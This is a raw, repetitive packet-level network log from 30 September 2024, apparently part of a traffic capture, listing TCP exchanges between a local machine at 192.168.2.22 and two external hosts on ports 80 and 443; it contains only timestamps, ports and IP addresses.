                                                                                                                        Sep 30, 2024 15:00:13.667031050 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667045116 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667054892 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667057037 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667073011 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667088032 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667097092 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667105913 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667109013 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667124987 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667124987 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667140007 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667145014 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667157888 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667161942 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667180061 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667185068 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667193890 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667220116 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667234898 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667251110 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667253971 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667268038 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667273998 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667284966 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667292118 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667315960 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667327881 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667412996 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.667669058 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.667718887 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.672390938 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.672451019 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.672657967 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.672672987 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.672713995 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.672816992 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.672832966 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.672847033 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.672863007 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.672866106 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.672879934 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.672895908 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673126936 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673144102 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673160076 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673178911 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673193932 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673202991 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673790932 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673808098 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673831940 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673846006 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673846960 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673855066 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673866034 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673871994 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673882008 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673886061 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.673903942 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.673919916 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.674778938 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.674843073 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.674887896 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.674904108 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.674931049 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.674937963 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.674947023 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.674947023 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.674968004 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.674974918 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.674978971 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.675013065 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.676202059 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.676224947 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.676238060 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.676251888 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.676259041 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.676270962 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.676286936 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.677614927 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.677673101 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.677676916 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.677690029 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.677726030 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.677761078 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.677772999 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.677786112 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.677814007 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.677838087 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.677961111 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.677972078 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.677993059 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.678005934 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.678014040 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.678018093 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.678030968 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.678033113 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.678049088 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.678071976 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.678719997 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.678733110 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.678745985 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.678775072 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.678848982 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.679220915 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.679233074 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.679246902 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.679270983 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.679286957 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.679353952 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.679367065 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.679379940 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.679431915 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.679481030 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.680124044 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.680179119 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.680291891 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.680305004 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.680318117 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.680340052 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.680355072 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.680422068 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.680433035 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.680474043 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.680953979 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.680995941 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.681006908 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.681016922 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.681030989 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.681049109 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.681073904 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.681086063 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.681097031 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.681133032 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.681133032 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.681953907 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.681965113 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.681972027 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.682049990 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:13.724256039 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:13.724302053 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:13.724366903 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:13.724764109 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:13.724778891 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:14.202019930 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:14.202130079 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:14.203522921 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:14.203536034 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:14.204977989 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:14.204986095 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:15.014924049 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:15.014990091 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:15.015012980 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:15.015029907 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:15.015060902 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:15.015078068 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:15.015151978 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:15.015168905 CEST44349170172.67.216.244192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:15.015182018 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:15.015216112 CEST49170443192.168.2.22172.67.216.244
                                                                                                                        Sep 30, 2024 15:00:15.015901089 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:15.020848036 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:15.183512926 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:15.183573961 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:15.514292955 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:15.519253016 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:15.519325018 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:15.519577980 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:15.524399042 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139849901 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139875889 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139889956 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139899969 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139913082 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139914036 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.139925003 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139936924 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139939070 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.139939070 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.139954090 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139961958 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.139961958 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.139966011 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139981985 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.139996052 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.140002966 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.140002966 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.140022993 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.144805908 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.144859076 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.144862890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.144908905 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.144917965 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.144963980 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.145159960 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.228342056 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.228408098 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.228514910 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.228579998 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.228595018 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.228609085 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.228619099 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.228624105 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.228634119 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.228657007 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.228678942 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.229091883 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229103088 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229115009 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229126930 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229141951 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.229168892 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.229562998 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229618073 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.229747057 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229758024 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229768038 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229779005 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.229794025 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.229818106 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.230302095 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.230345011 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.230453968 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.230465889 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.230477095 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.230487108 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.230496883 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.230503082 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.230525017 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.230542898 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.231246948 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.231300116 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.231432915 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.231482983 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.233182907 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.233227968 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.311208963 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.311222076 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.311232090 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.311286926 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.311309099 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317065001 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317075968 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317117929 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317133904 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317245960 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317257881 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317266941 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317279100 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317286968 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317290068 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317312002 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317327976 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317433119 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317445040 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317455053 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317476988 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317481995 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317487955 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317498922 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317501068 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317524910 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317547083 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317570925 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317581892 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317591906 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317604065 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317614079 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.317619085 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317640066 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317661047 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.317780018 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.318608046 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318619013 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318629980 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318639040 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318650961 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318660975 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318661928 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.318679094 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.318701029 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.318922997 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318933010 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318943024 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318953991 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318964958 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318969965 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.318979025 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318989038 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.318994045 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.319000006 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.319004059 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.319011927 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.319026947 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.319050074 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.319077015 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.319087982 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.319123983 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.319158077 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.395153046 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395214081 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.395298004 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395309925 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395317078 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395351887 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.395467043 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395478964 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395489931 CEST804917191.134.96.177192.168.2.22
